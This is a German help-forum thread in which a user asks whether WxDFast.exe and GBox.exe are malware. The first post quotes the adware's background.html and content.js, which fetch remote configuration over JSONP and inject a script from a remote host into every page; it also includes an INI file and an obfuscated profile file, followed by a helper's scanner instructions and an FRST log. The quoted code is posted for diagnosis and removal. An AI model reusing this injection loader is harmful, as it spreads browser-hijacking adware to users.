
Plagegeister aller Art und deren Bekämpfung: WxDFast.exe und GBox.exe = Maleware?

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen, die Malware zu entfernen oder unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner- oder Virenproblem sein, wird ein Experte Dir bei der Beseitigung der Infektion helfen.

Alt 21.08.2013, 18:48   #1
mikeDE
 
WxDFast.exe und GBox.exe = Maleware? - Icon21

WxDFast.exe und GBox.exe = Maleware?



Hallo erstmal
Ich habe das Problem, dass meine CPU-Auslastung eben ziemlich hoch war. Ich wollte wissen, welcher Prozess sie verursacht, und habe im Taskmanager nachgeschaut. Dort habe ich gesehen, dass zwei Prozesse laufen, die mir komisch vorkommen und viel CPU brauchen: WxdFast.exe (Benutzer SYSTEM) und GBox.exe (Benutzer: ich). Beide Dateien befinden sich unter dem Pfad C:\ProgramData: die GBox.exe unter C:\ProgramData\GBox\Gbox.exe und die wXDFast.exe unter C:\ProgramData\wXDFast\wXDFast.exe. Beide Dateien sind 206 KB groß. Beide Ordner, in denen sich die Dateien befinden, enthalten einen leeren "downloads"-Ordner und eine settings.ini. Der Ordner wXDFast enthält außerdem eine profil.ini, eine background.html und eine content.js (JavaScript). Der Inhalt der background.html:
HTML-Code:
<!DOCTYPE html><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script type="text/javascript">
// Built-in fallback list of update endpoints, separated by ';'. updater.update() requests the
// first entry and, if no answer was saved within 60 s, retries with the remainder of the list.
// Every entry carries the same query string (ext=wxd, pid=133, country=DE, regd=...).
// NOTE(review): the "hxxp" scheme is presumably the forum's defanging of "http"; left as posted.
var def_update_url='hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getsync.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getproxy5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getjpit.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://extsync.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getsyncer5.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpi-proxy.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://getjpiproxy.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpi-syncer.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://jpigetjson.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158;hxxp://thebflix.info/sync2/?ext=wxd&pid=133&country=DE&regd=120811093158';
// Built-in fallback script source. updater.update() passes it to updater.save() as `scode` when the
// URL list is empty, and updater.save() stores it under the 'content.js' key.
// When evaluated in a page, the snippet appends a <script id="wxdbflix_sc"> element whose src is
// def.jpisyncer.info/worker/init.js, so the code that actually runs is fetched from a remote host
// on every page load and is not contained in this file.
var def_script='(function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();';

// Namespace object for the lifecycle helpers (created as an implicit global: no var/let/const).
mng = new function(){};
// Decides whether the cached configuration is still current or a new one has to be fetched.
// Reads the 'jsondb.js' record from window.exLocalStorage; that storage object is not defined in
// this file (presumably supplied by the hosting plugin — confirm against bhoclass.dll).
// Three outcomes: record missing -> fetch from the built-in URL list; record unparsable -> same;
// record present -> fetch from the stored update_url once its epoch has passed, else re-check later.
mng.run=function(){

	try{
		var jsonDB=window.exLocalStorage.getItem('jsondb.js');
		if(jsonDB){
			try{
				jsonDB=JSON.parse(jsonDB);
				// Current time in whole seconds (see mng.getEpoch).
				var epoch = mng.getEpoch();
				
				// Stored epoch is the "valid until" time written by updater.save(); expired -> update
				// from the server-supplied URL list rather than the built-in one.
				if(parseInt(jsonDB.epoch) < epoch){
					updater.update(jsonDB.update_url);
				}
				else{
					// NOTE(review): uto is a difference in seconds, but setTimeout interprets its delay
					// as milliseconds, so the re-check fires far sooner than the stored epoch implies.
					var uto=(parseInt(jsonDB.epoch) - epoch);
					setTimeout(initialize,uto);
				}
			}
			catch(e){
				// Corrupt record: start over with the built-in endpoint list.
				updater.update(def_update_url);
				try{tga.track('/IE/bugs/JsonUnValid/'+e);}catch(e){}
			}
		}
		else{
			// No record yet (first run): fetch the initial configuration.
			updater.update(def_update_url);
			try{tga.track('/IE/NewUser');}catch(e){}
		}
	}
	catch(e){
		// Any other failure (e.g. storage object unavailable) reloads the background page.
		try{tga.track('/IE/bugs/runFailed/'+e);}catch(e){}
		mng.reload();
	}
}
// Returns the current time as whole seconds since the Unix epoch.
// The millisecond part is subtracted before dividing, so the result is an integer.
mng.getEpoch = function(){
	var d=new Date();
	try{
		return ((d.getTime()-d.getMilliseconds())/1000);
	}
	catch(e){
		// Fallback with the same intent: truncate milliseconds-since-epoch to seconds.
		return parseInt(d.getTime()/1000);
	}
}
// Reloads the background page; used by the error handlers in this file as a restart.
mng.reload=function(){
	self.location.reload();
}
// Logging stub: the console call is commented out, so this only returns true.
mng.log=function(e){
	//console.log(e);
	return true;
}

// Namespace object for the configuration/script updater (implicit global).
updater = new function(){};
// Set to 1 by updater.save() once a response has been stored.
updater.successful=0;
// Holds the <script> element of the request in flight, or 0 when none is pending.
updater.scripTag=0;
// Fetches a new configuration from a ';'-separated list of endpoints, one endpoint per attempt.
// sUrl: the remaining endpoint list. An empty/falsy list means every endpoint failed; the built-in
// defaults (def_update_url, def_script) are then written to storage instead.
updater.update=function(sUrl){
	try{
		if(!sUrl){
			// List exhausted: persist the built-in defaults so a script source is still stored.
			updater.save({
				epoch:1,
				update_url:def_update_url,
				scode:def_script
			});
			try{tga.track('/IE/NoDomains');}catch(e){}
		}
		else{
			// A request is already pending; do not start a second one.
			if(updater.scripTag){return;}
			// arrUrl is assigned without a declaration and therefore becomes a global.
			arrUrl=sUrl.split(';');
			updater.injectJson(arrUrl[0]);
			// Give the endpoint 60 s to answer (the answer arrives through getJson -> updater.save).
			setTimeout(function(){
				updater.removeStag();
				if(!updater.successful){
				
					// Drop the endpoint just tried plus one ';' separator, then try the next one.
					sUrl=sUrl.replace(arrUrl[0],'').replace(';','');
					updater.update(sUrl);
					try{tga.track('/IE/NoResponse/'+arrUrl[0]);}catch(e){}
					
				}
			},60000);
		}
	}
	catch(e){
		try{tga.track('/IE/bugs/updateFailed/'+e);}catch(e){}
		mng.reload();
	}
}

// Issues the update request as JSONP: a <script id="jsonPscript"> element is appended to <head>
// with src = sUrl + '&jsoncallback=getJson'.
// Security-relevant: the response is executed as script in the background page rather than parsed
// as data, so whoever answers for the endpoint controls code running in this context; the
// built-in endpoints are plain-HTTP URLs as posted.
updater.injectJson=function(sUrl){
	try{
		updater.scripTag=document.createElement("script");
		updater.scripTag.type="text/javascript";
		updater.scripTag.src=sUrl+'&jsoncallback=getJson';
		updater.scripTag.id='jsonPscript';
		document.getElementsByTagName("head")[0].appendChild(updater.scripTag);
	}
	catch(e){
		try{tga.track('/IE/bugs/JsonPfailed/'+e);}catch(e){}
		mng.reload();
	}
}

// Persists a configuration object (from the JSONP callback or the built-in defaults) into
// window.exLocalStorage.
// json.scode      -> stored under 'content.js' (settings.ini names content.js as the content script,
//                    so this is presumably the code the plugin injects into pages — confirm).
// json.update_url -> stored, together with the next-update time, in the 'jsondb.js' record.
// json.useconds   -> added to the current epoch seconds to form that next-update time.
// Every other key of json is stored verbatim under its own name.
updater.save=function(json){
	try{
		window.exLocalStorage.setItem('content.js',json.scode);
		// The record is built by string concatenation, not JSON.stringify.
		// NOTE(review): the built-in fallback object passed by updater.update() has no `useconds`,
		// so the sum is NaN and the stored text is not valid JSON; mng.run() would then hit its
		// parse-error branch and start again from def_update_url.
		window.exLocalStorage.setItem('jsondb.js', '{"epoch":'+(mng.getEpoch()+json.useconds)+',"update_url":"'+json.update_url+'"}');
		// k is not declared, so it becomes a global.
		for(k in json){
			if(k!='scode' && k!='update_url' && k!='useconds'){
				window.exLocalStorage.setItem(k, json[k]);
			}
		}
		// Tells the 60 s timeout in updater.update() not to try the next endpoint.
		updater.successful=1;
		try{tga.track('/IE/ActiveUsers');}catch(e){}
	}
	catch(e){
		try{tga.track('/IE/bugs/CantSave/'+e);}catch(e){}
	}
}
// Removes the pending JSONP <script> element from <head> and clears the in-flight marker so
// updater.update() may issue the next request.
updater.removeStag=function(){
	document.getElementsByTagName("head")[0].removeChild(updater.scripTag);
	updater.scripTag=0;
}




// Namespace object for usage tracking (implicit global).
tga = new function(){};
// Usage-tracking hook called throughout this file with a path such as '/IE/NewUser'.
// In this sample it is disabled: the unconditional `return true` below makes everything after it
// unreachable, so no tracking request is sent.
// The unreachable part would prefix the path with '/wxd' and request a Google Analytics
// __utm.gif URL (account 'UA-29381986-1', host name 'justplug_analytics.it') through an Image object.
tga.track=function(url){
	try{
	
		// Early exit: tracking switched off in this build.
		return true;
		
		url='/wxd'+url;
		var urchinCode='UA-29381986-1';
		var domain='justplug_analytics.it';

		  var i=1000000000,
			  utmn=tga.rand(i,9999999999),
			  cookie=tga.cookie,
			  random=tga.rand(i,2147483647),
			  today=(new Date()).getTime(),
			  img = new Image(),
			  urchinUrl = 'hxxp://www.google-analytics.com/__utm.gif?utmwv=1.3&utmn='
				  +utmn+'&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn='
				  +domain+'&utmr=ie&utmp='
				  +url+'&utmac='
				  +urchinCode+'&utmcc=__utma%3D'
				  +cookie+'.'+random+'.'+today+'.'+today+'.'
				  +today+'.2%3B%2B__utmb%3D'
				  +cookie+'%3B%2B__utmc%3D'
				  +cookie+'%3B%2B__utmz%3D'
				  +cookie+'.'+today
				  +'.2.2.utmccn%3D(referral)%7Cutmcsr%3Die_host%7Cutmcct%3Die_path%7Cutmcmd%3Dreferral%3B%2B__utmv%3D'
				  +cookie+'.-%3B';

		  // Assigning src is what would trigger the HTTP request.
		  img.src = urchinUrl;

	}catch(e){}
}
// Returns a pseudo-random integer in [min, max) based on Math.random(); returns 1 on any error.
tga.rand=function(min,max){
	try{
		return min + Math.floor(Math.random() * (max - min));
	}
	catch(e){return 1;}
}
// Random 8-digit value generated once per page load; used as the cookie id in the tracking URL.
tga.cookie=tga.rand(10000000,99999999);
// Load-time tracking call; a no-op in this sample because tga.track() returns immediately.
try{tga.track('/IE');}catch(e){}



// JSONP callback named in the request built by updater.injectJson(); the server's response calls it
// with the new configuration object, which is stored without any validation.
function getJson(json){updater.save(json);};
// Re-runs the update check; scheduled by mng.run() via setTimeout.
// NOTE(review): nothing in this file calls initialize() or mng.run() at load time — presumably the
// hosting plugin does; confirm.
function initialize(){mng.run();}
</script></head><body>&nbsp;</body></html>
Der Inhalt der Javascript Datei:
Code:
ATTFilter
// Content script as found on disk; identical to the def_script string in background.html.
// Picks "https://" when the current page URL contains it, otherwise the plain scheme ("hxxp" is
// presumably the forum's defanging), and, unless an element with id "wxdbflix_sc" already exists,
// appends a <script> to <head> that loads def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE.
// The behaviour on the visited page is therefore defined by that remote file, not by this one.
(function(){var str_http=window.self.location.href.indexOf("https://")>-1?"https://":"hxxp://";if(!document.getElementById("wxdbflix_sc")){var script=document.createElement("script");script.id="wxdbflix_sc";script.type="text/javascript";script.src=str_http+"def.jpisyncer.info/worker/init.js?ext=wxd&pid=133&country=DE";document.getElementsByTagName("head")[0].appendChild(script)};})();
         
. Inhalt der settings.ini:
Code:
ATTFilter
[IEPlugin]
modulename="bhoclass.dll"
clsid="{E73D4F0C-551D-C0E0-F981-BC40E0A3FAA8}"
progid="bhoclass.bho"
shortname="wxDfast"
version="1.0"
bgpage="background.html"
contentscript="content.js"

[Settings]
ChromeID	= "fgjmgaonhcgbelpohkmegjaneegiigil"
ChromeExt	= "fgjmgaonhcgbelpohkmegjaneegiigil.crx"
ChromeVer	= "1.0"
IEPlugin	= "bhoclass.dll"
FFID		= "5026268e6946d@5026268e694a6.info"
ProductName	= "wxDfast"
Publisher	= "wxDfast"
CategoryName = "Justplugit"
InstallDate = "20120805"
InfoURL		= "hxxp://wxdownloadmanager.com"
productID	= "{4F4C5E11-0612-48D2-8055-987992AAC432}"
RemoveURL	= "hxxp://uninstall.justplug.it/?ext=wxd"
         
der Inhalt der profile.ini :
Code:
ATTFilter
[mabVaygagnb8ayEaDabHaa]
kabGay1ahab8ayraDabpaywaBnbVaa=lEb5awnamYbZazraDaa
kabGay1ahab8ayraDabday1ahabVaa=lEb5awnamYbZazraDaa
kYbVaygaCYbVazraAabtay5aDabVazsaDYbZayEa=rna5adaaraaEaa
kab8aysaBabPazraAabVazsainbwaa=rnaHadra
nEbLazkaBYb9azsaWnbday1ahabVaa=mabxaa
kYbVayCaAnbHaznahnbGawnagnb9ayka=rYaEadwarYaLadaapaaLadwarna
inbKazraDabZayEaBabVazsainbwaa=qnaEadsaqYaGadYagYa4adgagEbZaysapaaGac5araaFadkaqEaEadsaraaEaa
kEbVazraCEbPay1aBYbtawna=WEbcawsaqnaEadYamYbyadCavna8adsapabbac9amnbdawnanEaJawnannaGadkavna8adganYa6awsamYa6awraqEbxadYannb0aa
kYbVazaaBEbGaznalnbGayEa=Aab9aznaCaa3ac1avEb6azCaDEaKaznaCYbZayraAEbKayEavYbPay5ahYbLac1aAnbKazraDabZayEaBabJaywaDabVac1aCabOazaavEbZayCahnbKaznafEb9azsagnbTaykavYbEayYaCaa/aysaDnbTayIahnb9ad9arYaEadwarYaEadCarnaFaa
lnbEaynagnb9aykaiabLazraDaaFaa=Aab9aznaCaa3ac1avEbEazsaBEb5azUaCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaGaa=Aab9aznaCaa3ac1avEbSazkaBabIaykaDabPay5aCEb4ay5agEaKayUaBYbMay1avEbNaykaDaaLaa
lnbEaynagnb9aykaiabLazraDaaHaa=Aab9aznaCaa3ac1avEbEazsahnbHazraCYbVayEahnbZazrahnbHazUaBYbTac5aAnbKaygaBEaLayCahnb9ac1a
lnbEaynagnb9aykaknb8aykaCYb4aa=CabGay1ahab8ayraDaa0ackakabGay1ahab8ayraDabpaywaBnbVackatYbEazkagYbPaynaonaVaxaaDnbSayEaAnbHayYahnbGawUamaaVacgahEbVay1aonaVawraBEb8ay5aDabGazUanEbLaynahnaVacgaCYbVayCaAnbHaznahnbGax1ahabZaznahna0ackakYbVayCaAnbHaznahnbGawnagnb9aykatnaMazraBYa0ackakEbVazsaAnbZayEajYb8ay9agYbVazsatnaMayUaBYbHaznaAnbUad9atnbtay5aCEb9aywaBabIaykaCYbtawnatnaMazraAnbUad9atnbjaykaCEbHayUaBEbKawUamaaVacgaDYbVazsaCEbPay1aBYa0adra
nnbTaznaAnb7aykakEbTayYahnbUazkaBabVazsa=lEb5awnamYbZazraDablazaahabZaznahnbGaxnagnbHayIaWEaHawrarnbcawwarnbwadYavnbxawwannbxac9aqaaGawsanYaJadUanYbdadUavna5adkannaGadCapnaEadYanYaHadnamYb0aa
kEbVazsaAnbZayEajYb8ay9agYbVazsa=qEaEaa
lnbEaynagnb9aykaiabLazraDabHaa=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
[jabLayCa]
jabZazraDablazaahabZaznahnbUaa=jnbLay5aDabZayCavaaYadsaraaKacaajnbZayUasaaGadaarnaHacaarna7adOarYa8adOarEaHaa
         
Dann befindet sich noch eine .crx-Datei mit endlos langem Namen im Ordner.
Die .crx-Datei (Chrome-Erweiterungsinstaller) habe ich nur einmal in Chrome > Erweiterungen gezogen, aber nicht auf Installieren gedrückt; die Erweiterung heißt wXDFast. Die GBox.exe habe ich bei hxxp://www.virustotal.com hochgeladen. Hier das Scan-Ergebnis: https://www.virustotal.com/de/file/31486eb4bf87f2f2dc29d56fc4fc68b7c2790342abb85796b9f7bb113eacb43f/analysis/ Dort steht, dass der Originalname der Datei wXDFast.exe ist und dass 3 Virenprogramme Alarm schlagen. Soweit ich das verstehe, ist das ein Trojan.Dropper. Meine Frage jetzt: Ist das Malware, und wenn ja, was soll ich machen?

Geändert von mikeDE (21.08.2013 um 19:33 Uhr)

Alt 21.08.2013, 20:38   #2
schrauber
/// the machine
/// TB-Ausbilder
 

WxDFast.exe und GBox.exe = Maleware? - Standard

WxDFast.exe und GBox.exe = Maleware?



Hi,

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)


Alt 22.08.2013, 10:40   #3
mikeDE
 
WxDFast.exe und GBox.exe = Maleware? - Standard

WxDFast.exe und GBox.exe = Maleware?



Ok, habe ich gemacht. Es ist aber noch etwas passiert: Mein Bruder war an dem PC, und AntiVir hat irgendeinen Adware-Virus gefunden. Ich war leider nicht da. Der gemeldete Pfad führte zu den beiden Ordnern, und er hat die beiden Ordner blöderweise gelöscht. Ich sollte mir echt ein Passwort einrichten. Ist jetzt alles wieder normal? Hier trotzdem das Log:
FRST.txt

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-08-2013 02
Ran by Niklas (administrator) on 22-08-2013 11:32:07
Running from C:\Users\Niklas\Desktop
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 10
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe
(Microsoft Corporation) C:\Windows\system32\WLANExt.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Microsoft Corporation) c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(Intel(R) Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe
(Protexis Inc.) c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\ccSvcHst.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesService64.exe
() C:\Program Files\Web Assistant\ExtensionUpdaterService.exe
() C:\Program Files\Web Assistant\ExtensionUpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2013\TuneUpUtilitiesApp64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Wistron) C:\Program Files (x86)\Launch Manager\HotkeyApp.exe
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\OSD.exe
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\WButton.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Synaptics Incorporated) C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
(Wistron Corp.) C:\Program Files (x86)\Launch Manager\WisLMSvc.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Mister Group) C:\Program Files (x86)\System Explorer\SystemExplorer.exe
(Mister Group) C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
(Microsoft Corporation) C:\Windows\system32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [IntelPROSet] - C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-09-16] (Intel(R) Corporation)
HKLM\...\Run: [IntelPAN] - C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-09-16] (Intel(R) Corporation)
HKLM\...\Run: [BTMTrayAgent] - C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [10372368 2011-03-30] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12681320 2011-08-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277480 2011-08-16] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] - C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3023600 2013-02-25] (Synaptics Incorporated)
HKCU\...\Run: [Skype] - C:\Program Files (x86)\Skype\Phone\Skype.exe [19875432 2013-06-21] (Skype Technologies S.A.)
HKCU\...\Run: [Spybot-S&D Cleaning] - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [3642312 2013-05-16] (Safer-Networking Ltd.)
HKCU\...\Policies\system: [LogonHoursAction] 2
HKCU\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
MountPoints2: {3ba2dfcb-42b1-11e1-9817-806e6f6e6963} - E:\cdstart.exe
HKLM-x32\...\Run: [IAStorIcon] - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-05-20] (Intel Corporation)
HKLM-x32\...\Run: [HotkeyApp] - C:\Program Files (x86)\Launch Manager\HotkeyApp.exe [207400 2011-08-06] (Wistron)
HKLM-x32\...\Run: [LMgrVolOSD] - C:\Program Files (x86)\Launch Manager\OSD.exe [348960 2011-08-06] (Wistron Corp.)
HKLM-x32\...\Run: [Wbutton] - C:\Program Files (x86)\Launch Manager\Wbutton.exe [447016 2011-08-13] (Wistron Corp.)
HKLM-x32\...\Run: [BlueStacks Agent] - C:\Program Files (x86)\BlueStacks\HD-Agent.exe [601928 2013-07-17] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [2255184 2013-06-28] (LogMeIn Inc.)
HKLM-x32\...\Run: [avgnt] - C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [345144 2013-08-18] (Avira Operations GmbH & Co. KG)
AppInit_DLLs: C:\PROGRA~3\Wincert\WIN64C~1.DLL C:\PROGRA~2\SEARCH~1\Datamngr\x64\datamngr.dll C:\PROGRA~2\SEARCH~1\Datamngr\x64\IEBHO.dll C:\Windows\system32\nvinitx.dll [1531256 2013-02-14] (Bandoo Media, inc)
AppInit_DLLs-x32: c:\progra~3\wincert\win32c~1.dll c:\windows\syswow64\nvinit.dll [7168 2013-02-07] ()
IMEO: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\groove.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hamachi-2-ui.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-apkhandler.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-runapp.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\hd-startlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\infopath.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\launcher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\misc.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\msaccess.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\msoxmled.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\mspub.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\mstore.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\ois.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\onenote.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\openvpntray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\outlook.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\uninstall.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
IMEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2013\TUAutoReactivator64.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\watchmi tray.lnk
